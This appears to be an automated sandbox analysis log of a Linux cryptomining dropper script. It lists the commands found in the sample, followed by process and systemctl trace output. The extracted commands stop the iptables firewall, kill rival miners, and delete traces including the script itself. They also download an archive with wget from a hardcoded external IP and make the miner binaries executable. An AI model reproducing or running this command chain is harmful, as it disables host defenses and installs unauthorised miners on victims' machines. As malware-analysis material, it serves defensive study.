Source: Initial sample | Potential command found: service iptables stop |
Source: Initial sample | Potential command found: rm -f /tmp/httpdlog/*.gz |
Source: Initial sample | Potential command found: rm -f *.gz |
Source: Initial sample | Potential command found: rm -f *.sh |
Source: Initial sample | Potential command found: rm -f $0 |
Source: Initial sample | Potential command found: killall -9 daemon.armv4l.mod |
Source: Initial sample | Potential command found: killall -9 daemon.i686.mod |
Source: Initial sample | Potential command found: killall -9 daemon.mips.mod |
Source: Initial sample | Potential command found: killall -9 daemon.mipsel.mod |
Source: Initial sample | Potential command found: killall -9 test.mod |
Source: Initial sample | Potential command found: killall -9 btminerd |
Source: Initial sample | Potential command found: killall -9 os64 |
Source: Initial sample | Potential command found: killall -9 os32 |
Source: Initial sample | Potential command found: killall -9 xptminer2 |
Source: Initial sample | Potential command found: killall -9 xptminer |
Source: Initial sample | Potential command found: killall -9 minerd |
Source: Initial sample | Potential command found: killall -9 mstrie |
Source: Initial sample | Potential command found: killall -9 mstxcn |
Source: Initial sample | Potential command found: killall -9 mstbit |
Source: Initial sample | Potential command found: killall -9 mstbtc |
Source: Initial sample | Potential command found: killall -9 ethermine |
Source: Initial sample | Potential command found: killall -9 zcash |
Source: Initial sample | Potential command found: killall -9 xxj |
Source: Initial sample | Potential command found: killall -9 yam |
Source: Initial sample | Potential command found: killall -9 metacity |
Source: Initial sample | Potential command found: killall -9 nautilus |
Source: Initial sample | Potential command found: rm -f /tmp/.httpdlog*.gz |
Source: Initial sample | Potential command found: echo "yes" |
Source: Initial sample | Potential command found: mkdir /tmp/.httpdlog |
Source: Initial sample | Potential command found: cd /tmp/.httpdlog |
Source: Initial sample | Potential command found: wget http://115.236.92.99:54321/mall.tar.gz |
Source: Initial sample | Potential command found: tar zxvf mall.tar.gz |
Source: Initial sample | Potential command found: chmod 777 m7xmr |
Source: Initial sample | Potential command found: chmod 777 minerm |
Source: Initial sample | Potential command found: chmod 777 mstxmr |
Source: Initial sample | Potential command found: chmod 777 ./m7xmr |
Source: Initial sample | Potential command found: chmod 777 ./minerm |
Source: Initial sample | Potential command found: chmod 777 ./mstxmr |
Source: Initial sample | Potential command found: chmod 777 999 |
Source: Initial sample | Potential command found: chmod 777 ALib |
Source: Initial sample | Potential command found: chmod 777 ./999 |
Source: Initial sample | Potential command found: chmod 777 ./ALib |
Source: Initial sample | Potential command found: echo "ok" |
Source: /bin/ps (PID: 18040) | File opened: /proc/17200/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17200/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17200/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17321/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17321/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17321/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17289/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17289/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17289/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17284/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17284/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17284/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/2396/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/2396/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/2396/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17160/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17160/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17160/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17161/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17161/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17161/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/1180/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/1180/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/1180/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17208/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17208/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17208/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17329/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17329/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17329/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/16875/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/16875/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/16875/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17204/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17204/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17204/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/2308/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/2308/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/2308/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17206/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17206/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17206/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/10/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/10/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/10/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/11/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/11/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/11/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17211/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17211/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17211/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/12/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/12/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/12/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17179/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17179/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17179/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/13/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/13/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/13/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17334/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17334/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17334/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/14/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/14/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/14/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/9475/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/9475/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/9475/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17214/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17214/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17214/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/15/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/15/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/15/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/16/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/16/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/16/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/18/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/18/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/18/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17210/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17210/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17210/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/19/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/19/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/19/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/17170/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/17170/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/17170/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/1194/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/1194/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/1194/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/1/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/1/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/1/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/2/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/2/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/2/cmdline |
Source: /bin/ps (PID: 18040) | File opened: /proc/2315/stat |
Source: /bin/ps (PID: 18040) | File opened: /proc/2315/status |
Source: /bin/ps (PID: 18040) | File opened: /proc/2315/cmdline |
Source: /usr/sbin/service (PID: 17728) | Systemctl executable: /bin/systemctl -> systemctl stop iptables.service |
Source: /usr/sbin/service (PID: 17731) | Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target |
Source: /usr/sbin/service (PID: 17733) | Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket |
Source: /usr/sbin/service (PID: 17791) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket |
Source: /usr/sbin/service (PID: 17792) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket |
Source: /usr/sbin/service (PID: 17796) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket |
Source: /usr/sbin/service (PID: 17803) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket |
Source: /usr/sbin/service (PID: 17823) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket |
Source: /usr/sbin/service (PID: 17834) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket |
Source: /usr/sbin/service (PID: 17838) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket |
Source: /usr/sbin/service (PID: 17847) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket |
Source: /usr/sbin/service (PID: 17858) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket |
Source: /usr/sbin/service (PID: 17865) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket |
Source: /usr/sbin/service (PID: 17874) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket |
Source: /usr/sbin/service (PID: 17883) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket |
Source: /usr/sbin/service (PID: 17895) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket |
Source: /usr/sbin/service (PID: 17903) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket |
Source: /usr/sbin/service (PID: 17910) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket |
Source: /usr/sbin/service (PID: 17921) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket |
Source: /usr/sbin/service (PID: 17932) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket |
Source: /usr/sbin/service (PID: 17941) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket |
Source: /usr/sbin/service (PID: 17950) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket |
Source: /usr/sbin/service (PID: 17954) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket |
Source: /usr/sbin/service (PID: 17961) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket |
Source: /usr/sbin/service (PID: 17972) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket |
Source: /usr/sbin/service (PID: 17987) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket |
Source: /usr/sbin/service (PID: 17993) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket |